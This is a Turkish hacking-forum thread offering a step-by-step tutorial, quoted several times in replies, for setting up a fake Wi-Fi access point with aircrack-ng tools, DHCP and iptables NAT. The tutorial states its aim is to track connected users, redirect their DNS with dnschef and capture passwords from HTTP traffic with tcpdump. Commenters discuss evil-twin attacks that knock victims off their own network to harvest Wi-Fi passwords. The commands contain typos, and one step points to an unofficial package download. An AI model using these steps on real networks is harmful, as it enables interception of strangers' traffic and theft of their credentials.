Sahte Kablosuz Ağı Oluşturmak

kanserojen

Katılımcı Üye
1 Ara 2018
880
47
Eline sağlık dostum

Teşekkürler Dargaaltay

elinize sağlık. evil twin olarak da kullanılabilir mi? yardımcı adaptörle karşıdaki wifi kesip, aynı adda sizin yöntemle bir ağ oluştursak? ama sorun şu ki sahte arayüz kullanmak istemiyorum (modeme bağlanınca oturum aç mesajı gibi). yani önce karşı wifi kesilerek handshake yakalasak, sonra bu handshake ile ağımızı oluştursak, kurban sahte ağa bağlanmak zorunda kalacak. ve wifi bağlanmak için şifresini girecek. umarım anlatabildim. böyle bir şey yapılabilir mi hocam. toollar var ama vasat geliyor . hata veriyor vs.

Merhaba, evet "Evil Twin" olarak kullanılabilir.
Aşağıdaki metni okuyabilirsiniz.

Bu adımlara kadar geldikten sonra ilgili testleri yapın. Bu sayede bir kullanıcının IP'sini alıp onu izleyebilirsiniz dnschef ile dns yönlendirmesi yaparak ve tcpdump ile de http trafiğinde parola bilgilerini alabiliriz.

Metin yardımcı olmadıysa "Özel Mesaj" atabilirsin.

Fakat dediğin şey bir tık zor ve kendi ağımı neden bu tehlikeye atayım ki?

Saygılarımla...
kanserojen

Elinize sağlık hocam.

Eline sağlık...........

emegine saglik tesekkurler

Elinize sağlık hocam

Teşekkürler dostlar.


Saygısızlık etmek istemem ama çok çok daha basit ve etkili bir yöntem biliyorum.

Bize bunlarla gell

Ellerine sağlık ,

Eline Sağlık Yararlı Konu :))

eline sağlık , eyw

Elinize sağlık güzel çalışma

Teşekkürler arkadaşlar...

PWX Alternatif yollar illa ki vardır...

Ellerine sağlık :)

Teşekkürler :))

Elinize sağlık hocam.

Teşekkürler MekoR :cool

Eline sağlık üstad

Teşekkürler SiyahSey. :incele

Ellerine sağlık, iyi avlar :trl

Teşekkürler hocam :)) :cool

Elinize sağlık hocam, yararlı konu :)

Teşekkürler qiotin :))

eline sağlık hocam

Teşekkürler drjacob :)
 
Son düzenleme:

sveltenheig

Yeni üye
8 Ağu 2023
2
0
NZr505.png


Aircrack-ng Nedir?


Aircrack-ng, bir paket dinleyici veya WEP ve WPA/WPA2 şifrelerini kıran bir dedektör diyebiliriz. Aircrack aracını kullanırken bazı öğrenmemiz gereken komutlar var. Bunlar;

"airodump-ng" , "aireplay-ng" , "aircrack-ng" ve "airdecap-ng" bugün ki konumuzda göreceğimiz komutlar.

NZr505.png


Aircrack ile Sahte Kablosuz Ağ Oluşturma


Terminalimizi açıp ilk komudumuz ile başlayalım.

Kod:
ifconfig

Ekran-Alintisi1.jpg


NZr505.png


WLAN14 Bizim ağ adaptörümüz demektir.

Şimdi sahte erişim noktası için ağ adaptörümüzü kullanalım ve airmon-ng aracımız ile sanal bir arayüz oluşturalım ve bağlantımızı başlatalım.

NZr505.png


Kod:
airmon-ng start wlan14

Ekran-Alintisi2.jpg


Artık dinleme yapmayı veya sahte erişim noktası yapabilmek için ağ adaptörümüzu kullanabilirsiniz,
airmon-ng aracıyla sanal bir arayüz oluşturup ilgili bağlantımızı başlatalım,

mon1 adında bir arayüz oluştu test edelim bakalım etrafdaki kablosuz ağlarımız gözüküyor mu, Fakat onu yapmadan hata vermemesi için şu komutu yazalım,

NZr505.png


Kod:
modprobe r8187se

Ekran-Alintisi3.jpg


Ardından mon1 arayüzümüzü test edelim,

NZr505.png


Kod:
airodum-ng mon1

Ekran-Alintisi4.jpg


Bu ağa bağlanıcak kişilere ip verebilmek adına DHCP sunucumuzu kuruyoruz

NZr505.png


Kod:
apt-get install dhcp3-server

Ekran-Alintisi5.jpg


Yüklenmezse manuel bir şekilde indirmek için bu dosyayı indirin http://oemsources.volumio.org/brystonair/1.365/isc-dhcp-server.tar.gz

Ardından bu komudu yazalım

NZr505.png


Kod:
tar -xvf isc-dhcp-server.tar.gz -C /test

Ekran-Alintisi6.jpg


.dep paketimiz yüklendikten sonra sistemi sonra yeniden başlatalım.

NZr505.png


Kod:
dpkg -i isc.dhcp.server.dep

Ekran-Alintisi7.jpg


NZr505.png


Kod:
reboot

Ekran-Alintisi8.jpg


Sonra IP aralığını verebilmek için dhcp servisimizin conf dosyasını düzenleyelim

NZr505.png


Kod:
nano /etc/dhcp3/dhcpd.conf

Ekran-Alintisi9.jpg


ve direkt bu kısmı copy-paste yapın.



NZr505.png


Ardından airbase-ng komuduyla kablosuz ağı oluşturalım.

Kod:
airbase-ng -e FreeWifi -c 11 -v wlan1 &

Ekran-Alintisi10.jpg


NZr505.png


at0 isimli bir sanal arabirimi indirelim,

Kod:
ifconfig at0 up

Ekran-Alintisi11.jpg


Kod:
ifconfig at0 10.0.0.254 netmask 255.255.255.0

NZr505.png


route komutunu yazalım,

Kod:
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254

Ekran-Alintisi12.jpg


NZr505.png


iptable ayarlarımızı yapalım,

Kod:
iptables --flush

Ekran-Alintisi13.jpg


Kod:
iptables --table nat --flush

Ekran-Alintisi14.jpg


Kod:
iptables --delete-chain

Ekran-Alintisi15.jpg


NZr505.png


Kod:
iptables -P FORWARD ACCEPT

Ekran-Alintisi16.jpg


Kod:
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Ekran-Alintisi17.jpg



NZr505.png


DHCP serverimizi başlatalım,

Kod:
dhcpd -d -f -cf /etc/dhcp3/dhcpd.conf at0 &

Ekran-Alintisi18.jpg


NZr505.png


geçiş yapacak IP'lerimizi yönlendirelim.

Kod:
echo "1" > /proc/sys/net/ipv4/ip_forward

Ekran-Alintisi19.jpg


Bu adımlara kadar geldikten sonra ilgili testleri yapın. Bu sayede bir kullanıcının IP'sini alıp onu izleyebilirsiniz dnschef ile dns yönlendirmesi yaparak ve tcpdump ile de http trafiğinde parola bilgilerini alabiliriz.

NZr505.png

hocM
 

sveltenheig

Yeni üye
8 Ağu 2023
2
0
NZr505.png


Aircrack-ng Nedir?


Aircrack-ng, bir paket dinleyici veya WEP ve WPA/WPA2 şifrelerini kıran bir dedektör diyebiliriz. Aircrack aracını kullanırken bazı öğrenmemiz gereken komutlar var. Bunlar;

"airodump-ng" , "aireplay-ng" , "aircrack-ng" ve "airdecap-ng" bugün ki konumuzda göreceğimiz komutlar.

NZr505.png


Aircrack ile Sahte Kablosuz Ağ Oluşturma


Terminalimizi açıp ilk komudumuz ile başlayalım.

Kod:
ifconfig

Ekran-Alintisi1.jpg


NZr505.png


WLAN14 Bizim ağ adaptörümüz demektir.

Şimdi sahte erişim noktası için ağ adaptörümüzü kullanalım ve airmon-ng aracımız ile sanal bir arayüz oluşturalım ve bağlantımızı başlatalım.

NZr505.png


Kod:
airmon-ng start wlan14

Ekran-Alintisi2.jpg


Artık dinleme yapmayı veya sahte erişim noktası yapabilmek için ağ adaptörümüzu kullanabilirsiniz,
airmon-ng aracıyla sanal bir arayüz oluşturup ilgili bağlantımızı başlatalım,

mon1 adında bir arayüz oluştu test edelim bakalım etrafdaki kablosuz ağlarımız gözüküyor mu, Fakat onu yapmadan hata vermemesi için şu komutu yazalım,

NZr505.png


Kod:
modprobe r8187se

Ekran-Alintisi3.jpg


Ardından mon1 arayüzümüzü test edelim,

NZr505.png


Kod:
airodum-ng mon1

Ekran-Alintisi4.jpg


Bu ağa bağlanıcak kişilere ip verebilmek adına DHCP sunucumuzu kuruyoruz

NZr505.png


Kod:
apt-get install dhcp3-server

Ekran-Alintisi5.jpg


Yüklenmezse manuel bir şekilde indirmek için bu dosyayı indirin http://oemsources.volumio.org/brystonair/1.365/isc-dhcp-server.tar.gz

Ardından bu komudu yazalım

NZr505.png


Kod:
tar -xvf isc-dhcp-server.tar.gz -C /test

Ekran-Alintisi6.jpg


.dep paketimiz yüklendikten sonra sistemi sonra yeniden başlatalım.

NZr505.png


Kod:
dpkg -i isc.dhcp.server.dep

Ekran-Alintisi7.jpg


NZr505.png


Kod:
reboot

Ekran-Alintisi8.jpg


Sonra IP aralığını verebilmek için dhcp servisimizin conf dosyasını düzenleyelim

NZr505.png


Kod:
nano /etc/dhcp3/dhcpd.conf

Ekran-Alintisi9.jpg


ve direkt bu kısmı copy-paste yapın.



NZr505.png


Ardından airbase-ng komuduyla kablosuz ağı oluşturalım.

Kod:
airbase-ng -e FreeWifi -c 11 -v wlan1 &

Ekran-Alintisi10.jpg


NZr505.png


at0 isimli bir sanal arabirimi indirelim,

Kod:
ifconfig at0 up

Ekran-Alintisi11.jpg


Kod:
ifconfig at0 10.0.0.254 netmask 255.255.255.0

NZr505.png


route komutunu yazalım,

Kod:
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254

Ekran-Alintisi12.jpg


NZr505.png


iptable ayarlarımızı yapalım,

Kod:
iptables --flush

Ekran-Alintisi13.jpg


Kod:
iptables --table nat --flush

Ekran-Alintisi14.jpg


Kod:
iptables --delete-chain

Ekran-Alintisi15.jpg


NZr505.png


Kod:
iptables -P FORWARD ACCEPT

Ekran-Alintisi16.jpg


Kod:
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Ekran-Alintisi17.jpg



NZr505.png


DHCP serverimizi başlatalım,

Kod:
dhcpd -d -f -cf /etc/dhcp3/dhcpd.conf at0 &

Ekran-Alintisi18.jpg


NZr505.png


geçiş yapacak IP'lerimizi yönlendirelim.

Kod:
echo "1" > /proc/sys/net/ipv4/ip_forward

Ekran-Alintisi19.jpg


Bu adımlara kadar geldikten sonra ilgili testleri yapın. Bu sayede bir kullanıcının IP'sini alıp onu izleyebilirsiniz dnschef ile dns yönlendirmesi yaparak ve tcpdump ile de http trafiğinde parola bilgilerini alabiliriz.

NZr505.png

hocam aircrack linki var mı
 

Homax

Üye
9 Ocak 2023
57
15
elinize sağlık. evil twin olarak da kullanılabilir mi? yardımcı adaptörle karşıdaki wifi kesip, aynı adda sizin yöntemle bir ağ oluştursak? ama sorun şu ki sahte arayüz kullanmak istemiyorum (modeme bağlanınca oturum aç mesajı gibi). yani önce karşı wifi kesilerek handshake yakalasak, sonra bu handshake ile ağımızı oluştursak, kurban sahte ağa bağlanmak zorunda kalacak. ve wifi bağlanmak için şifresini girecek. umarım anlatabildim. böyle bir şey yapılabilir mi hocam. toollar var ama vasat geliyor . hata veriyor vs.
Elinize sağlık, teşekkürler.
 

kst132

Junior Hunter
12 Haz 2023
922
550
NZr505.png


Aircrack-ng Nedir?


Aircrack-ng, bir paket dinleyici veya WEP ve WPA/WPA2 şifrelerini kıran bir dedektör diyebiliriz. Aircrack aracını kullanırken bazı öğrenmemiz gereken komutlar var. Bunlar;

"airodump-ng" , "aireplay-ng" , "aircrack-ng" ve "airdecap-ng" bugün ki konumuzda göreceğimiz komutlar.

NZr505.png


Aircrack ile Sahte Kablosuz Ağ Oluşturma


Terminalimizi açıp ilk komudumuz ile başlayalım.

Kod:
ifconfig

Ekran-Alintisi1.jpg


NZr505.png


WLAN14 Bizim ağ adaptörümüz demektir.

Şimdi sahte erişim noktası için ağ adaptörümüzü kullanalım ve airmon-ng aracımız ile sanal bir arayüz oluşturalım ve bağlantımızı başlatalım.

NZr505.png


Kod:
airmon-ng start wlan14

Ekran-Alintisi2.jpg


Artık dinleme yapmayı veya sahte erişim noktası yapabilmek için ağ adaptörümüzu kullanabilirsiniz,
airmon-ng aracıyla sanal bir arayüz oluşturup ilgili bağlantımızı başlatalım,

mon1 adında bir arayüz oluştu test edelim bakalım etrafdaki kablosuz ağlarımız gözüküyor mu, Fakat onu yapmadan hata vermemesi için şu komutu yazalım,

NZr505.png


Kod:
modprobe r8187se

Ekran-Alintisi3.jpg


Ardından mon1 arayüzümüzü test edelim,

NZr505.png


Kod:
airodum-ng mon1

Ekran-Alintisi4.jpg


Bu ağa bağlanıcak kişilere ip verebilmek adına DHCP sunucumuzu kuruyoruz

NZr505.png


Kod:
apt-get install dhcp3-server

Ekran-Alintisi5.jpg


Yüklenmezse manuel bir şekilde indirmek için bu dosyayı indirin http://oemsources.volumio.org/brystonair/1.365/isc-dhcp-server.tar.gz

Ardından bu komudu yazalım

NZr505.png


Kod:
tar -xvf isc-dhcp-server.tar.gz -C /test

Ekran-Alintisi6.jpg


.dep paketimiz yüklendikten sonra sistemi sonra yeniden başlatalım.

NZr505.png


Kod:
dpkg -i isc.dhcp.server.dep

Ekran-Alintisi7.jpg


NZr505.png


Kod:
reboot

Ekran-Alintisi8.jpg


Sonra IP aralığını verebilmek için dhcp servisimizin conf dosyasını düzenleyelim

NZr505.png


Kod:
nano /etc/dhcp3/dhcpd.conf

Ekran-Alintisi9.jpg


ve direkt bu kısmı copy-paste yapın.



NZr505.png


Ardından airbase-ng komuduyla kablosuz ağı oluşturalım.

Kod:
airbase-ng -e FreeWifi -c 11 -v wlan1 &

Ekran-Alintisi10.jpg


NZr505.png


at0 isimli bir sanal arabirimi indirelim,

Kod:
ifconfig at0 up

Ekran-Alintisi11.jpg


Kod:
ifconfig at0 10.0.0.254 netmask 255.255.255.0

NZr505.png


route komutunu yazalım,

Kod:
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254

Ekran-Alintisi12.jpg


NZr505.png


iptable ayarlarımızı yapalım,

Kod:
iptables --flush

Ekran-Alintisi13.jpg


Kod:
iptables --table nat --flush

Ekran-Alintisi14.jpg


Kod:
iptables --delete-chain

Ekran-Alintisi15.jpg


NZr505.png


Kod:
iptables -P FORWARD ACCEPT

Ekran-Alintisi16.jpg


Kod:
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Ekran-Alintisi17.jpg



NZr505.png


DHCP serverimizi başlatalım,

Kod:
dhcpd -d -f -cf /etc/dhcp3/dhcpd.conf at0 &

Ekran-Alintisi18.jpg


NZr505.png


geçiş yapacak IP'lerimizi yönlendirelim.

Kod:
echo "1" > /proc/sys/net/ipv4/ip_forward

Ekran-Alintisi19.jpg


Bu adımlara kadar geldikten sonra ilgili testleri yapın. Bu sayede bir kullanıcının IP'sini alıp onu izleyebilirsiniz dnschef ile dns yönlendirmesi yaparak ve tcpdump ile de http trafiğinde parola bilgilerini alabiliriz.

NZr505.png

Elinize sağlık
 

harasad

Katılımcı Üye
14 Eyl 2023
307
106
NZr505.png


Aircrack-ng Nedir?


Aircrack-ng, bir paket dinleyici veya WEP ve WPA/WPA2 şifrelerini kıran bir dedektör diyebiliriz. Aircrack aracını kullanırken bazı öğrenmemiz gereken komutlar var. Bunlar;

"airodump-ng" , "aireplay-ng" , "aircrack-ng" ve "airdecap-ng" bugün ki konumuzda göreceğimiz komutlar.

NZr505.png


Aircrack ile Sahte Kablosuz Ağ Oluşturma


Terminalimizi açıp ilk komudumuz ile başlayalım.

Kod:
ifconfig

Ekran-Alintisi1.jpg


NZr505.png


WLAN14 Bizim ağ adaptörümüz demektir.

Şimdi sahte erişim noktası için ağ adaptörümüzü kullanalım ve airmon-ng aracımız ile sanal bir arayüz oluşturalım ve bağlantımızı başlatalım.

NZr505.png


Kod:
airmon-ng start wlan14

Ekran-Alintisi2.jpg


Artık dinleme yapmayı veya sahte erişim noktası yapabilmek için ağ adaptörümüzu kullanabilirsiniz,
airmon-ng aracıyla sanal bir arayüz oluşturup ilgili bağlantımızı başlatalım,

mon1 adında bir arayüz oluştu test edelim bakalım etrafdaki kablosuz ağlarımız gözüküyor mu, Fakat onu yapmadan hata vermemesi için şu komutu yazalım,

NZr505.png


Kod:
modprobe r8187se

Ekran-Alintisi3.jpg


Ardından mon1 arayüzümüzü test edelim,

NZr505.png


Kod:
airodum-ng mon1

Ekran-Alintisi4.jpg


Bu ağa bağlanıcak kişilere ip verebilmek adına DHCP sunucumuzu kuruyoruz

NZr505.png


Kod:
apt-get install dhcp3-server

Ekran-Alintisi5.jpg


Yüklenmezse manuel bir şekilde indirmek için bu dosyayı indirin http://oemsources.volumio.org/brystonair/1.365/isc-dhcp-server.tar.gz

Ardından bu komudu yazalım

NZr505.png


Kod:
tar -xvf isc-dhcp-server.tar.gz -C /test

Ekran-Alintisi6.jpg


.dep paketimiz yüklendikten sonra sistemi sonra yeniden başlatalım.

NZr505.png


Kod:
dpkg -i isc.dhcp.server.dep

Ekran-Alintisi7.jpg


NZr505.png


Kod:
reboot

Ekran-Alintisi8.jpg


Sonra IP aralığını verebilmek için dhcp servisimizin conf dosyasını düzenleyelim

NZr505.png


Kod:
nano /etc/dhcp3/dhcpd.conf

Ekran-Alintisi9.jpg


ve direkt bu kısmı copy-paste yapın.



NZr505.png


Ardından airbase-ng komuduyla kablosuz ağı oluşturalım.

Kod:
airbase-ng -e FreeWifi -c 11 -v wlan1 &

Ekran-Alintisi10.jpg


NZr505.png


at0 isimli bir sanal arabirimi indirelim,

Kod:
ifconfig at0 up

Ekran-Alintisi11.jpg


Kod:
ifconfig at0 10.0.0.254 netmask 255.255.255.0

NZr505.png


route komutunu yazalım,

Kod:
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254

Ekran-Alintisi12.jpg


NZr505.png


iptable ayarlarımızı yapalım,

Kod:
iptables --flush

Ekran-Alintisi13.jpg


Kod:
iptables --table nat --flush

Ekran-Alintisi14.jpg


Kod:
iptables --delete-chain

Ekran-Alintisi15.jpg


NZr505.png


Kod:
iptables -P FORWARD ACCEPT

Ekran-Alintisi16.jpg


Kod:
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Ekran-Alintisi17.jpg



NZr505.png


DHCP serverimizi başlatalım,

Kod:
dhcpd -d -f -cf /etc/dhcp3/dhcpd.conf at0 &

Ekran-Alintisi18.jpg


NZr505.png


geçiş yapacak IP'lerimizi yönlendirelim.

Kod:
echo "1" > /proc/sys/net/ipv4/ip_forward

Ekran-Alintisi19.jpg


Bu adımlara kadar geldikten sonra ilgili testleri yapın. Bu sayede bir kullanıcının IP'sini alıp onu izleyebilirsiniz dnschef ile dns yönlendirmesi yaparak ve tcpdump ile de http trafiğinde parola bilgilerini alabiliriz.

NZr505.png

👏👏
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.